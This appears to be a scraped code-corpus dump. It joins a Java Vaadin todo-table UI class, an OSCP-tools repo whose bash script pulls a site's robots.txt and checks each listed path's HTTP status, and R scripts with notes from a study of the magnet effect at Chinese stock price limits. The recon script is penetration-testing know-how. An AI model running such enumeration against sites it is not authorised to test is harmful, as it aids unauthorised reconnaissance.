String[] benTo = { "name", "id", "pid", "isContainer" };
for (int i = 0; i < benTo.length; i++) {// 需要进行赋值的
Property itemProperty = beanItem.getItemProperty(benTo[i]);
Object newValue = mainTreeTable.getContainerDataSource()
.getContainerProperty(beanItem, benTo[i]).getValue();
itemProperty.setValue(newValue);
}
Todo todo = beanItem.getBean();
initTodoProId(todo);
return todo;
}
// Keyboard navigation
class KbdHandler implements com.vaadin.event.Action.Handler {
private static final long serialVersionUID = -2993496725114954915L;
Action f2 = new ShortcutAction("F2", ShortcutAction.KeyCode.F2, null);
@Override
public Action[] getActions(Object target, Object sender) {
return new Action[] { f2 };
}
@Override
public void handleAction(Action action, Object sender, Object target) {
System.out.println("sdfdf");
if (target instanceof TreeTable) {
// Object itemid = ((TextField) target).getData();
HashMap<Object, Field> itemMap = fields.get(currentBeanItem);
for (Field f : itemMap.values()) {
f.focus();
}
}
}
}
public class ValueEditColumnGenerator implements ColumnGenerator {
/**
*
*/
private static final long serialVersionUID = -5950078454864053894L;
@Override
public Object generateCell(Table source, final Object itemId, Object columnId) {
Button editButton = new Button("");
editButton.addStyleName(Reindeer.BUTTON_LINK);
editButton.setIcon(Images.EDIT);
editButton.addClickListener(new ClickListener() {
public void buttonClick(ClickEvent event) {
// WW_TODO 后台进行修改
EditTodoPopupWindow editTodoPop = new EditTodoPopupWindow(
(BeanItem<Todo>) itemId,projectId);
editTodoPop.addListener(new SubmitEventListener() {
private static final long serialVersionUID = 1L;
@Override
protected void cancelled(SubmitEvent event) {
}
@Override
protected void submitted(SubmitEvent event) {
if(event.getData() != null){
//将值copy回来,进行日历刷新
copyBeanValueToContainer(hContainer,(BeanItem<Todo>) event.getData());
main.refreshCalendarView();
}
}
});
ViewToolManager.showPopupWindow(editTodoPop);
}
});
return editButton;
}
}
}
|
036b5be32e7ae78e73a52262c48cdedc99d29a64
|
[
"Java",
"Ant Build System",
"INI"
] | 9
|
INI
|
klwork/klwork-social
|
dae0601505995119c678af8c970cdcd15d8bf7f8
|
989538a5aef1d19d382a8b3b493eef4e303b9f38
|
refs/heads/master
|
<repo_name>jinnu92/OSCP-tools<file_sep>/robots.txt.test.sh
#!/bin/bash
# Pass to me the URL:
# e.g.:
# ./robots.txt.test.sh http://10.10.0.22
#
wget $1/robots.txt
for url in $(for uri in $(awk '{print $2}' robots.txt |egrep '^/');
do
echo $1$uri;
done);
do curl -o /dev/null --silent --head --write-out '%{url_effective}:%{http_code}\n' $url;
done
<file_sep>/README.md
# OSCP-tools
Custom Tools and Notes from my OSCP PWK experience
## Recon Tools
* *Robots.txt.test.sh* - This tool will grab the robots.txt file and run through each entry to display the HTTP status of the file.
* Run with `chmod +x robots.txt.test.sh && ./robots.txt.test.sh`
|
d0fa4f95b9a7761b445d8a56170c9a7a39ae4fe0
|
[
"Markdown",
"Shell"
] | 2
|
Shell
|
jinnu92/OSCP-tools
|
26cf65cf0cdf880ee3cbceec48dceb36e89c3dd7
|
032d92ff303db7b7b0803eef999a0c185714b2e9
|
refs/heads/master
|
<file_sep>### 筛选样本条件
+ 样本期
+ 主板
+ 非ST
+ 交易状态正常
### Diagram
+ greater reach-limit possibility
+ up v.s. down
+ hit v.s. last(when ending)
+ robustness: daily v.s. intraday estimate
+ the closer, the stronger effect
+ the harder to value, the stronger effect
+ the stronger investor sentiment, the stronger effect
# rhetorics
+ Technically, we exclude observations where stock hits the price limit within 3 seconds from the stock market opening
+ If there was really bad news overnight, the price will hit the lower price limit at market opening, thus the maximum price percent change would be fixed at around -10% during the day.
+ Note that there exist more stock-days that have a maximum or minimum price percent change at zero, which are clipped for a neater prospect.
+ It indicates that whenever the magnet effect takes effect, investors will no longer care about what quality the stock is, growth or not, profitable or not.
# Introduction
+ normal
+ certain price
+ china, limit, picture
+ high distribution fig
# Data & Summary Statistics
+ table
+ reach time ditribution
# 123
+ 要去掉开盘就到各个阈值的,在分析的时候
+ 涨到9%和开盘就到9%是不一样的
+ 最大的绝对涨幅(统计图)
<file_sep>library(tidyverse)
library(lubridate)
library(readxl)
library(zoo)
library(cnquant)
library(stargazer)
library(scales)
load("data/01-D-Sequential-Data.RData")
load("~/Documents/Stock-Data/D-Stock-Daily-Data.RData")
# Valid indices ----
# 开盘的价格不能超过阈值
Nonopen_Valid_Indices <- list(
UP = sapply(thresholds, function(threshold)
with(Stock_Daily_Data3$UP, S_DQ_OPEN < S_DQ_PRECLOSE * (1 + threshold))),
DOWN = sapply(-thresholds, function(threshold)
with(Stock_Daily_Data3$DOWN, S_DQ_OPEN > S_DQ_PRECLOSE * (1 + threshold)))
)
# # Valid N
# N_Valid_Indices <- N %>%
# lapply(function(x) apply(x, 2, function(y) between(y, 2L, 4798L)))
# Probs_Theo valid indices
Probs_Theo_Valid_Indices <- Probs_Theo %>%
lapply(function(x) !is.na(x))
# Aggregate valid indices
Valid_Indices <- list(
UP = Nonopen_Valid_Indices$UP & Probs_Theo_Valid_Indices$UP,
DOWN = Nonopen_Valid_Indices$DOWN & Probs_Theo_Valid_Indices$DOWN
)
# 有效样本数量
Valid_Thre_Count <- Valid_Indices %>%
sapply(function(x) apply(x, 2, sum)) %>%
cbind(ALL = apply(., 1, sum), .) %>%
t() %>%
`colnames<-`(percent(thresholds, accuracy = .1)) %>%
`rownames<-`(c("All", "Upper", "Lower")) %>%
as_tibble(rownames = "Direction")
## 输出有效样本数量
Valid_Thre_Count
# 日最大收益率的分布及比例 ----
p_Max_Dist <- Stock_Daily_Data1 %>%
mutate(HIGH_PCTCHANGE = S_DQ_HIGH / S_DQ_PRECLOSE - 1) %>%
ggplot(aes(x = HIGH_PCTCHANGE)) +
geom_histogram(binwidth = 0.0001) +
scale_x_continuous(labels = percent) +
coord_cartesian(ylim = c(0, 10000)) +
labs(x = "Maximum price percent change in the day",
y = "Count")
p_Max_Dist_Zoom <- p_Max_Dist +
coord_cartesian(xlim = c(0.08, 0.1), ylim = c(0, 10000))
p_Min_Dist <- Stock_Daily_Data1 %>%
mutate(LOW_PCTCHANGE = S_DQ_LOW / S_DQ_PRECLOSE - 1) %>%
ggplot(aes(x = LOW_PCTCHANGE)) +
geom_histogram(binwidth = 0.0001) +
scale_x_continuous(labels = percent) +
coord_cartesian(ylim = c(0, 10000)) +
labs(x = "Minimum price percent change in the day",
y = "Count")
p_Min_Dist_Zoom <- p_Min_Dist +
coord_cartesian(xlim = c(-0.1, -0.08), ylim = c(0, 10000))
## 输出图像
Rmisc::multiplot(p_Max_Dist, p_Max_Dist_Zoom, p_Min_Dist, p_Min_Dist_Zoom, cols = 2L)
## 极端收益占比表格
Extreme_Prop <- tibble(
Direction = c("All", "Upper", "Lower"),
`Obs. All` = nrow(Stock_Daily_Data1),
`Obs. Reach 9%` = c(Stock_Daily_Data2 %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_UP_THRESHOLD) %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_DOWN_THRESHOLD) %>% nrow()),
`Obs. Reach Limit` = c(Stock_Daily_Data2 %>% filter(REACH_UP_LIMIT | REACH_DOWN_LIMIT) %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_UP_LIMIT) %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_DOWN_LIMIT) %>% nrow())
) %>%
mutate(`Prob. Reach 9%` = `Obs. Reach 9%` / `Obs. All`,
`Prob. Reach Limit` = `Obs. Reach Limit` / `Obs. All`,
`Con. Prob. Reach Limit` = `Prob. Reach Limit` / `Prob. Reach 9%`) %>%
mutate_at(vars(`Prob. Reach 9%`:`Con. Prob. Reach Limit`),
formattable::percent, digits = 1L)
Extreme_Prop
# MCMC示意图 ----
set.seed(36L)
Exam_Traj <- Sim.DiffProc::GBM(N = N$UP[1, 1],
M = 10,
x0 = Stock_Daily_Data3$UP$UP_THRESHOLD[1],
t0 = t1$UP[1, 1] / 14400L,
theta = Stock_Daily_Data3$UP$mu[1],
sigma = Stock_Daily_Data3$UP$sigma[1])
p_Exam_Traj <- Exam_Traj %>%
data.frame(Time = time(.), .) %>%
as_tibble() %>%
gather(Trajectory, Price, -Time) %>%
ggplot(aes(x = Time, y = Price, group = Trajectory)) +
geom_line(size = 0.2) +
scale_x_continuous(limits = c(13/24, 1),
breaks = seq(14/24, 1, length.out = 6),
labels = parse_time(c("132000", "134000", "140000", "142000", "144000", "150000"), format = "%H%M%S")) +
scale_y_continuous(limits = c(12, 12.65),
breaks = c(12, 12.2, Stock_Daily_Data3$UP$UP_THRESHOLD[1], 12.4, Stock_Daily_Data3$UP$UP_LIMIT[1], 12.6),
labels = dollar_format(prefix = "¥")) +
geom_hline(yintercept = Stock_Daily_Data3$UP$UP_THRESHOLD[1], col = "blue") +
geom_hline(yintercept = Stock_Daily_Data3$UP$UP_LIMIT[1], col = "red")
# Baseline results ----
# 保留需要的变量
Stock_Daily_Data3$UP <- Stock_Daily_Data3$UP %>% mutate(reach_prac = REACH_UP_LIMIT)
Stock_Daily_Data3$DOWN <- Stock_Daily_Data3$DOWN %>% mutate(reach_prac = REACH_DOWN_LIMIT)
Stock_Daily_Data3 <- Stock_Daily_Data3 %>%
lapply(select, S_INFO_WINDCODE, TRADE_DT, reach_prac)
# 把理论概率结果合并入原数据
Core_Data <- list(
UP = Stock_Daily_Data3$UP %>%
mutate(prob_theo = Probs_Theo$UP[, 1]) %>%
filter(Valid_Indices$UP[, 1]),
DOWN = Stock_Daily_Data3$DOWN %>%
mutate(prob_theo = Probs_Theo$DOWN[, 1]) %>%
filter(Valid_Indices$DOWN[, 1])
)
# 生成一个总表
Core_Data$ALL <- bind_rows(Core_Data, .id = "Direction")
# 真实概率与理论概率
Prac_Vs_Theo <- Core_Data %>%
lapply(function(df) {
df %>%
summarise(Prob_Prac = mean(reach_prac),
Prob_Theo = mean(prob_theo),
Diff = Prob_Prac - Prob_Theo,
t.stat = t.test(reach_prac, prob_theo, paired = TRUE)$statistic,
p.value = t.test(reach_prac, prob_theo, paired = TRUE)$p.value,
N = n())
}) %>%
bind_rows(.id = "Direction")
## 调整格式并输出Prac_Vs_Theo
Prac_Vs_Theo <- Prac_Vs_Theo %>%
mutate(Direction = factor(Direction, levels = c("ALL", "UP", "DOWN"),
labels = c("All", "Upper", "Lower"))) %>%
arrange(Direction) %>%
rename(`Prac. Prob.` = Prob_Prac,
`Theo. Prob.` = Prob_Theo,
Diff. = Diff,
`T Stat.` = t.stat,
`P Value` = p.value) %>%
mutate_at(vars(`Prac. Prob.`:Diff.), formattable::percent, digits = 1L)
Prac_Vs_Theo
# Compare at different thresholds ----
# 实际概率
probs_prac <- list(
UP = apply(Valid_Indices$UP, 2, function(x)
mean(Stock_Daily_Data3$UP$reach_prac[x])),
DOWN = apply(Valid_Indices$DOWN, 2, function(x)
mean(Stock_Daily_Data3$DOWN$reach_prac[x]))
)
# 理论概率
Probs_Theo_bak <- Probs_Theo
Probs_Theo$UP[!Valid_Indices$UP] <- NA
Probs_Theo$DOWN[!Valid_Indices$DOWN] <- NA
probs_theo <- Probs_Theo %>%
lapply(function(x) apply(x, 2, mean, na.rm = TRUE))
# exploratory plots
plot(probs_prac$UP, type = "b", col = "red")
lines(probs_theo$UP, type = "b", col = "cyan")
plot(probs_prac$DOWN, type = "b", col = "red")
lines(probs_theo$DOWN, type = "b", col = "cyan")
# explanatory plot
Diff_Thre <- list(prob_prac = probs_prac, prob_theo = probs_theo) %>%
lapply(simplify2array) %>%
lapply(as_tibble) %>%
lapply(mutate, threshold = thresholds) %>%
bind_rows(.id = "prob_type") %>%
mutate(ALL = (UP + DOWN) / 2) %>%
gather(direction, prob, UP, DOWN, ALL) %>%
mutate(direction = factor(direction,
levels = c("ALL", "UP", "DOWN"),
labels = c("All", "Upper", "Lower")))
p_Diff_Thre <- Diff_Thre %>%
ggplot(aes(x = threshold, y = prob, col = prob_type)) +
geom_line(alpha = 0.5) +
geom_point(size = 2) +
scale_x_continuous("Starting threshold",
breaks = thresholds,
labels = scales::percent_format(accuracy = .1)) +
scale_y_continuous("Probability to reach price limit",
limits = c(NA, 1),
labels = scales::percent) +
scale_colour_discrete("Type of probablity", labels = c("Practical", "Theoretical")) +
facet_wrap(~ direction, ncol = 1L)
## 输出p_Diff_Thre
p_Diff_Thre
# Hard to value ----
# 生成各种hard to value指标
Hard_Data <- Stock_Daily_Data %>%
select(S_INFO_WINDCODE, TRADE_DT, S_DQ_AMOUNT, S_VAL_MV, S_VAL_PE_TTM,
S_DQ_FREETURNOVER, S_PRICE_DIV_DPS) %>%
filter(TRADE_DT >= format(start_date %>% ymd() %m-% months(6), "%Y%m%d"),
TRADE_DT <= end_date) %>%
# 将无交易的0变为NA,否则log会变成-Inf
mutate_at(vars(S_DQ_AMOUNT, S_DQ_FREETURNOVER),
replace_certain, pattern = 0, replacement = NA) %>%
# 取log
mutate_at(vars(S_DQ_AMOUNT:S_PRICE_DIV_DPS), log) %>%
# 取平均
group_by(S_INFO_WINDCODE) %>%
mutate_at(vars(S_DQ_AMOUNT:S_PRICE_DIV_DPS), rollapply,
width = list(-60:-1), FUN = mean, na.rm = TRUE, fill = NA) %>%
ungroup() %>%
# 只保留样本期
filter(TRADE_DT >= start_date) %>%
# 根据股息率是否缺失生成是否发放股息变量
mutate(NON_DIV = is.na(S_PRICE_DIV_DPS))
# # 上市时间
# conn <- wind_sql_connect()
# Hard_Data <- tbl(conn, "AShareDescription") %>%
# select(S_INFO_WINDCODE, S_INFO_LISTDATE) %>%
# collect() %>%
# left_join(Hard_Data, .) %>%
# mutate(AGE_LIST = ymd(TRADE_DT) - ymd(S_INFO_LISTDATE))
# Hard_Data <- tbl(conn, "AShareIntroduction") %>%
# select(S_INFO_WINDCODE, S_INFO_FOUNDDATE) %>%
# collect() %>%
# left_join(Hard_Data, .) %>%
# mutate(AGE_FOUND = ymd(TRADE_DT) - ymd(S_INFO_FOUNDDATE))
# DBI::dbDisconnect(conn)
# # 对hard to value指标在每个交易日分组
# Hard_Data <- Hard_Data %>%
# group_by(TRADE_DT) %>%
# mutate_at(vars(S_DQ_AMOUNT:S_PRICE_DIV_DPS), divide, n_group = 5L) %>%
# ungroup()
# 合并hard to value数据
Core_Data_Plus_Hard <- Core_Data %>%
lapply(left_join, Hard_Data)
# 测试hard to value分组指标的函数
test_group_var <- function(group, data = Core_Data_Plus_Hard, direction = "ALL") {
group <- sym(group)
data[[direction]] %>%
group_by(!! group) %>%
summarise(Prob_Prac = mean(reach_prac),
Prob_Theo = mean(prob_theo),
Diff = Prob_Prac - Prob_Theo,
t.stat = t.test(reach_prac, prob_theo, paired = TRUE)$statistic,
p.value = t.test(reach_prac, prob_theo, paired = TRUE)$p.value,
N = n()) %>%
return()
}
# 分组变量
hard_vars <- Hard_Data %>%
select(S_DQ_AMOUNT:NON_DIV) %>%
names()
# # 分组结果
# hard_vars %>%
# lapply(test_group_var)
# glm结果
glmfit_S_VAL_MV1 <- glm(
reach_prac ~ prob_theo + S_VAL_MV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_VAL_MV2 <- glm(
reach_prac ~ prob_theo + Direction + S_VAL_MV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_VAL_PE_TTM1 <- glm(
reach_prac ~ prob_theo + S_VAL_PE_TTM,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_VAL_PE_TTM2 <- glm(
reach_prac ~ prob_theo + Direction + S_VAL_PE_TTM,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_NON_DIV1 <- glm(
reach_prac ~ prob_theo + NON_DIV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_NON_DIV2 <- glm(
reach_prac ~ prob_theo + Direction + NON_DIV,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_PRICE_DIV_DPS1 <- glm(
reach_prac ~ prob_theo + S_PRICE_DIV_DPS,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_PRICE_DIV_DPS2 <- glm(
reach_prac ~ prob_theo + Direction + S_PRICE_DIV_DPS,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
## 生成回归表格(需到时改为latex格式)
stargazer(glmfit_S_VAL_MV1, glmfit_S_VAL_MV2, glmfit_S_VAL_PE_TTM1, glmfit_S_VAL_PE_TTM2,
type = "text",
title = "Excess Probability Reaching Price Limit with Hard-to-Value Firms",
table.placement = "H",
dep.var.labels = "Reaching Price Limit",
covariate.labels = c("Theoretical Probability", "Upper", "Market Value", "Price to Earnings"),
header = FALSE)
stargazer(glmfit_NON_DIV1, glmfit_NON_DIV2, glmfit_S_PRICE_DIV_DPS1, glmfit_S_PRICE_DIV_DPS2,
type = "text",
title = "Excess Probability Reaching Price Limit with Hard-to-Value Firms (Continued)",
table.placement = "H",
dep.var.labels = "Reaching Price Limit",
covariate.labels = c("Theoretical Probability", "Upper", "None-Divident", "Price to Dividend"),
header = FALSE)
# 交易活跃程度 ----
glmfit_S_DQ_AMOUNT1 <- glm(
reach_prac ~ prob_theo + S_DQ_AMOUNT,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_DQ_AMOUNT2 <- glm(
reach_prac ~ prob_theo + Direction + S_DQ_AMOUNT,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_DQ_FREETURNOVER1 <- glm(
reach_prac ~ prob_theo + S_DQ_FREETURNOVER,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
glmfit_S_DQ_FREETURNOVER2 <- glm(
reach_prac ~ prob_theo + Direction + S_DQ_FREETURNOVER,
family = binomial,
data = Core_Data_Plus_Hard$ALL
)
## 生成回归表格
stargazer(glmfit_S_DQ_AMOUNT1, glmfit_S_DQ_AMOUNT2,
glmfit_S_DQ_FREETURNOVER1, glmfit_S_DQ_FREETURNOVER2,
type = "text",
title = "Excess Probability Reaching Price Limit with Active-Trading Firms",
table.placement = "H",
dep.var.labels = "Reaching Price Limit",
covariate.labels = c("Theoretical Probability", "Upper", "Trading Volume", "Turnover"),
header = FALSE)
# # Investor sentiment ----
# # 读取ISI数据
# ISI_Data <- read_csmar_data("data/ISI综合情绪指数表/QX_ISI.xls") %>%
# arrange(SgnMonth) %>%
# mutate(YEARMON = str_remove(SgnMonth, "-")) %>%
# filter(YEARMON >= "201410", YEARMON <= "201810") %>%
# mutate(ISI = divide(ISI, n_group = 3L)) %>%
# mutate(ISI = factor(ISI, levels = 3:1, labels = c("High", "Medium", "Low"))) %>%
# select(YEARMON, ISI)
#
# # 合并ISI数据
# Core_Data_Plus_Hard <- Core_Data_Plus_Hard %>%
# lapply(mutate, YEARMON = substr(TRADE_DT, 1L, 6L)) %>%
# lapply(left_join, ISI_Data)
#
# # ISI results
# test_group_var("ISI", direction = "UP")
# test_group_var("ISI", direction = "DOWN")
# test_group_var("ISI")
#
# # glm
# glm(
# reach_prac ~ prob_theo + ISI,
# family = binomial,
# data = Core_Data_Plus_Hard$DOWN
# ) %>%
# summary()
#
# # CICSI
# CICSI_Data <- read_csmar_data("data/CICSI综合情绪指数表/QX_CICSI.xls") %>%
# arrange(SgnMonth) %>%
# mutate(YEARMON = str_remove(SgnMonth, "-")) %>%
# filter(YEARMON >= "201410", YEARMON <= "201810") %>%
# mutate(CICSI = divide(CICSI, n_group = 3L)) %>%
# mutate(CICSI = factor(CICSI, levels = 3:1, labels = c("High", "Medium", "Low"))) %>%
# select(YEARMON, CICSI)
# Core_Data_Plus_Hard <- Core_Data_Plus_Hard %>%
# lapply(left_join, CICSI_Data)
# test_group_var("CICSI", direction = "UP")
# test_group_var("CICSI", direction = "DOWN")
# test_group_var("CICSI")
# glm(
# reach_prac ~ prob_theo + CICSI,
# family = binomial,
# data = Core_Data_Plus_Hard$DOWN
# ) %>%
# summary()
#
#
# # Market state ----
# load("~/Documents/Stock-Data/D-Index-Daily-Data.RData")
# Market_State_Data <- Index_Daily_Data %>%
# filter(S_INFO_WINDCODE == "000001.SH") %>%
# filter(TRADE_DT >= "20140101") %>%
# transmute(TRADE_DT, Market_State = rollapply(S_DQ_PCTCHANGE, width = list(-120:-1), FUN = mean, na.rm = TRUE, fill = NA)) %>%
# mutate(Market_State = Market_State >= 0) %>%
# filter(TRADE_DT >= start_date)
# Core_Data_Plus_Hard <- Core_Data_Plus_Hard %>%
# lapply(left_join, Market_State_Data)
# glm(
# reach_prac ~ prob_theo + Market_State,
# family = binomial,
# data = Core_Data_Plus_Hard$DOWN
# ) %>%
# summary()
# Trigger ----
# 按是否Trigger分为两类
Trigger_Data <- list(
UP = Stock_Daily_Data3$UP %>%
mutate(prob_theo = Probs_Theo_bak$UP[, 1]) %>%
mutate(Trigger = Nonopen_Valid_Indices$UP[, 1]) %>%
filter(Probs_Theo_Valid_Indices$UP[, 1]),
DOWN = Stock_Daily_Data3$DOWN %>%
mutate(prob_theo = Probs_Theo_bak$DOWN[, 1]) %>%
mutate(Trigger = Nonopen_Valid_Indices$DOWN[, 1]) %>%
filter(Probs_Theo_Valid_Indices$DOWN[, 1])
)
Trigger_Data$ALL <- bind_rows(Trigger_Data, .id = "Direction")
## 输出Trigger结果
Trigger_Results_Table <- test_group_var("Trigger", data = Trigger_Data) %>%
mutate(Trigger = factor(Trigger, labels = c("No", "Yes"))) %>%
rename(`Triggered during Trading` = Trigger,
`Prac. Prob.` = Prob_Prac,
`Theo. Prob.` = Prob_Theo,
Diff. = Diff,
`T Stat.` = t.stat,
`P Value` = p.value) %>%
mutate_at(vars(`Prac. Prob.`:Diff.), formattable::percent, digits = 1L)
Trigger_Results_Table
# 机构持股比例 ----
# 下载机构持股数据
conn <- wind_sql_connect()
AShareinstHolderDerData <- tbl(conn, "AShareinstHolderDerData") %>%
select(S_INFO_WINDCODE, REPORT_PERIOD, S_HOLDER_PCT) %>%
collect()
DBI::dbDisconnect(conn)
# 合并出总的机构持股比例
Inst_Hold_Data <- AShareinstHolderDerData %>%
# 合并机构持股比例
group_by(S_INFO_WINDCODE, REPORT_PERIOD) %>%
summarise(INST_HOLD = sum(S_HOLDER_PCT, na.rm = TRUE)) %>%
ungroup() %>%
# 分组
group_by(REPORT_PERIOD) %>%
mutate(INST_HOLD = divide(INST_HOLD, n_group = 5)) %>%
ungroup() %>%
# 生成季度时间
mutate(REPORT_PERIOD = as.yearqtr(REPORT_PERIOD, format = "%Y%m%d"))
rm(AShareinstHolderDerData)
# 合并机构持股比例数据
Core_Data_Plus_Inst <- Core_Data %>%
lapply(mutate, REPORT_PERIOD = as.yearqtr(TRADE_DT, format = "%Y%m%d") - 0.25) %>%
lapply(left_join, Inst_Hold_Data)
## 机构持股比例结果
Inst_Results_Table <- test_group_var("INST_HOLD", data = Core_Data_Plus_Inst) %>%
na.omit() %>%
rename(`Inst. Hold.` = INST_HOLD,
`Prac. Prob.` = Prob_Prac,
`Theo. Prob.` = Prob_Theo,
Diff. = Diff,
`T Stat.` = t.stat,
`P Value` = p.value) %>%
mutate_at(vars(`Prac. Prob.`:Diff.), formattable::percent, digits = 1L)
Inst_Results_Table
# # glm
# glm(
# reach_prac ~ prob_theo + Direction + INST_HOLD,
# family = binomial,
# data = Core_Data_Plus_Inst$ALL
# ) %>%
# summary()
# 保存数据 ----
# save.image("data/02-D-Analysis.RData")
save(start_date,
end_date,
Stock_Daily_Data3,
Extreme_Prop,
Valid_Thre_Count,
Prac_Vs_Theo,
Trigger_Results_Table,
Inst_Results_Table,
list = c(grep("^glmfit", ls(), value = TRUE),
grep("^p_", ls(), value = TRUE)),
file = "data/02-D-For-Rmd-Paper.RData")
<file_sep>library(tidyverse)
library(lubridate)
library(zoo)
library(parallel)
library(cnquant)
# Initialize ----
# 到基础股票数据的路径
# path_to_basic <- "~/Documents/Stock-Data"
path_to_basic <- "~/einzbern/Stock-Data"
# 读取基础股票数据
load(paste0(path_to_basic, "/D-Stock-Daily-Data.RData"))
# 最终样本期间为对应有Tick数据的时间
start_date <- "20141010" # Tick数据开始的时间
end_date <- "20181010" # Tick数据结束的时间
# 并行运算使用核心数量
ncl <- 20L
socket_type <- "PSOCK"
# 使用哪些板的股票
# board_codes <- c("000", "001", "600", "601", "603") # only主板
board_codes <- c("000", "001", "600", "601", "603", "002", "300") # 全部
# 分别到主板和中小创业板数据的路径
# path_to_mainboard <- "/mnt/sdc2/WIND_DATA/ID_BT_SHARES_A"
path_to_mainboard <- "G:/WIND_DATA/ID_BT_SHARES_A"
path_to_sme <- "H:/WIND_DATA/ID_BT_SHARES_S"
path_to_ge <- "H:/WIND_DATA/ID_BT_SHARES_G"
# 涨跌幅阈值
threshold <- 0.09
thresholds <- seq(0.09, 0.099, by = 0.001)
# # 留存一份初始数据(标号为0#的) ----
# # 注意这里直接筛选到了最终样本期,而另一部分数据因为需要滚动计算开始时比样本期更长
# Stock_Daily_Data0 <- Stock_Daily_Data %>%
# # 需要的变量
# select(S_INFO_WINDCODE:S_DQ_CLOSE, S_DQ_PCTCHANGE, S_DQ_TRADESTATUS, UP_DOWN_LIMIT_STATUS, ST) %>%
# # 样本期
# filter(TRADE_DT >= start_date) %>%
# filter(TRADE_DT <= end_date) %>%
# # 使用哪些板的股票
# filter(substr(S_INFO_WINDCODE, 1L, 3L) %in% board_codes)
#
# Stock_Daily_Data01 <- Stock_Daily_Data0 %>%
# # 非ST
# filter(!ST) %>%
# # 正常交易状态
# filter(S_DQ_TRADESTATUS %in% c("交易", "DR", "XD", "XR")) %>%
# # 去掉最高价超过涨停价的有问题的样本点,20141009之后只有一个20151218复牌的000520,2块到20块
# filter(S_DQ_HIGH <= round(S_DQ_PRECLOSE * 1.1 + .Machine$double.eps ^ 0.5, 2))
# 初筛样本,需要的变量和时间区间 ----
Stock_Daily_Data <- Stock_Daily_Data %>%
# 需要的变量
select(S_INFO_WINDCODE:S_DQ_CLOSE, S_DQ_PCTCHANGE, S_DQ_TRADESTATUS,
UP_DOWN_LIMIT_STATUS, ST) %>%
# 样本期,因为需要滚动窗口,这里比Tick样本期间多取6个月
filter(TRADE_DT >= format(start_date %>% ymd() %m-% months(13), "%Y%m%d")) %>%
filter(TRADE_DT <= end_date) %>%
# 使用哪些板的股票
filter(substr(S_INFO_WINDCODE, 1L, 3L) %in% board_codes)
# 生成需要变量 ----
Stock_Daily_Data <- Stock_Daily_Data %>%
# 计算涨跌阈值和涨跌停价格,及是否达到
mutate(UP_LIMIT = round(S_DQ_PRECLOSE * 1.1 + .Machine$double.eps ^ 0.5, 2),
DOWN_LIMIT = round(S_DQ_PRECLOSE * 0.9 + .Machine$double.eps ^ 0.5, 2),
UP_THRESHOLD = S_DQ_PRECLOSE * (1 + threshold),
DOWN_THRESHOLD = S_DQ_PRECLOSE * (1 - threshold),
REACH_UP_LIMIT = S_DQ_HIGH == UP_LIMIT,
REACH_DOWN_LIMIT = S_DQ_LOW == DOWN_LIMIT,
REACH_UP_THRESHOLD = S_DQ_HIGH >= UP_THRESHOLD,
REACH_DOWN_THRESHOLD = S_DQ_LOW <= DOWN_THRESHOLD)
# 日度数据滚动估计每日的参数mu和sigma ----
# 估计完后调整到标准样本期
# 估计均值和标准差的函数
mu_sigma <- function(x) c(mean(x, na.rm = TRUE), sd(x, na.rm = TRUE))
system.time(
Stock_Daily_Data <- Stock_Daily_Data %>%
# 生成对数收益率
mutate(Ri = log(1 + S_DQ_PCTCHANGE / 100)) %>%
# rolling window用对数收益率的均值和标准差估计几何布朗运动的参数mu和sigma
group_by(S_INFO_WINDCODE) %>%
do(data.frame(
.,
rollapply(.$Ri, list(-260:-21), mu_sigma, fill = NA),
stringsAsFactors = FALSE
)) %>%
ungroup() %>%
select(-Ri, -starts_with("rollapply")) %>%
rename(mu = X1, sigma = X2) %>%
mutate(mu = mu + 1 / 2 * sigma ^ 2) %>%
# 滚动窗口计算完之后只保留有Tick数据的期间
filter(TRADE_DT >= start_date)
)
# # 添加前一天的Kline数据路径 ----
# Stock_Daily_Data1 <- Stock_Daily_Data %>%
# mutate(kline_path_lag1 = case_when(
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("000", "001") ~
# paste0(path_to_mainboard, "/KLine/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("600", "601", "603") ~
# paste0(path_to_mainboard, "/KLine/SH/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("002") ~
# paste0(path_to_sme, "/KLine/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv"),
# substr(S_INFO_WINDCODE, 1L, 3L) %in% c("300") ~
# paste0(path_to_ge, "/KLine/SZ/", TRADE_DT, "/", substr(S_INFO_WINDCODE, 1L, 6L), ".csv")
# )) %>%
# # 类似的也可以用前一天的高频数据估计试试,生成前一天的路径,因为要lag日期,所以放在filter之前
# group_by(S_INFO_WINDCODE) %>%
# mutate(kline_path_lag1 = lag(kline_path_lag1)) %>%
# ungroup()
Stock_Daily_Data1 <- Stock_Daily_Data
# 二筛样本,非ST等破坏个股连续时间样本的要求 ----
Stock_Daily_Data1 <- Stock_Daily_Data1 %>%
# 非ST
filter(!ST) %>%
# 正常交易状态
filter(S_DQ_TRADESTATUS %in% c("交易", "DR", "XD", "XR")) %>%
# 去掉最高价超过涨停价的有问题的样本点,20141009之后只有一个20151218复牌的000520,2块到20块
filter(S_DQ_HIGH <= UP_LIMIT)
# 三筛样本,最大绝对涨幅超过threshold(如9%)的样本点 ----
Stock_Daily_Data2 <- Stock_Daily_Data1 %>%
# 只需保留过阈值的交易日
filter(REACH_UP_THRESHOLD | REACH_DOWN_THRESHOLD) %>%
# 对涨跌分别去掉开盘时就超过阈值的
